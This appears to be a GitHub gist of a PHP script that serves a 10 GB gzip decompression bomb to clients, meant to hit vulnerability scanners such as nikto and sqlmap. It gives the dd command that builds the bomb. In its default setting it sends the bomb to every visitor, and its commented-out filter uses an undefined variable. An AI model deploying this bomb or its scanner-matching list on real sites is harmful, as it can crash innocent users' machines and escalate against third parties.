Created
August 29, 2017 20:51
-
-
Save r3code/24d8dacb454e5117816d81bc457c399f to your computer and use it in GitHub Desktop.
Скрипт для отсылки zip-бомбы атакующему веб-сайт сканнеру, или источнику пытающемуся вызвать вредоносный код PHP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| See original source at https://habrahabr.ru/post/332580/ | |
| Create bomb file in Linux with: dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip | |
| Bomb must be GZIP compressed | |
| */ | |
| $bomb_file_path = '10G.gzip'; // path to a HUGE file, same folder as it's script | |
| /* // Uncomment to enable | |
| // WordPress specific protection | |
| $agent = filter_input(INPUT_SERVER, 'HTTP_USER_AGENT'); | |
| //check for nikto, sql map or "bad" subfolders which only exist on wordpress | |
| if (strpos($agent, 'nikto') !== false || strpos($agent, 'sqlmap') !== false || startswith($url,'wp-') || startswith($url,'wordpress') || startswith($url,'wp/')) | |
| { | |
| sendGZIPBomb($bomb_file_path); | |
| exit(); | |
| } | |
| */ | |
| // comment if used WordPress protection above | |
| sendGZIPBomb($bomb_file_path); | |
| exit(); | |
| function sendGZIPBomb($file_path){ | |
| //prepare the client to recieve GZIP data. This will not be suspicious | |
| //since most web servers use GZIP by default | |
| header("Content-Encoding: gzip"); | |
| header("Content-Length: ".filesize($file_path)); | |
| //Turn off output buffering | |
| if (ob_get_level()) ob_end_clean(); | |
| //send the gzipped file to the client | |
| readfile($file_path); | |
| } | |
| function startsWith($a, $b) { | |
| return strpos($a, $b) === 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment